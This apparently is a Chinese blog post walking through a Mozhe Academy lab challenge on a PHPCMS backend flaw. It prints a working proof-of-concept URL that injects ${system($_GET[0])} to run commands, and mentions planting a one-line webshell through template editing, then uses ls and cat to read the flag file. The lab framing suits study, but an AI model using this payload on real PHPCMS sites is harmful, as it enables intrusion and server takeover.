美文网首页
墨者学院-CMS系统漏洞分析溯源(第2题)

墨者学院-CMS系统漏洞分析溯源(第2题)

作者: nohands_noob | 来源:发表于2019-07-13 16:19 被阅读0次

靶场地址:
https://www.mozhe.cn/bug/detail/ajFqNFRadkk2alNtOVRUVm9MSXA2Zz09bW96aGUmozhe

用到的漏洞介绍:

漏洞编号:WooYun-2015-0153630

漏洞名称:phpcms后台低权限任意命令执行

Poc:

index.php?0=[命令]&m=content&c=content&a=public_categorys&type=add&menuid=822;${system($_GET[0])}&pc_hash=vad6K3&from=block

首先找到后台地址,养成好习惯先查看robots.txt是否有有用的信息


发现了后台地址,并且账号密码自动填充,可以直接登录
这里获得key有两种方法,一种是在界面-模板风格修改代码注入一句话木马,然后使用菜刀连接。

一种是使用上述漏洞执行代码
执行ls命令,发现key所在


执行cat key_16041211526820.php,查看网页源代码


相关文章

网友评论

      本文标题:墨者学院-CMS系统漏洞分析溯源(第2题)

      本文链接:https://www.haomeiwen.com/subject/xrrmkctx.html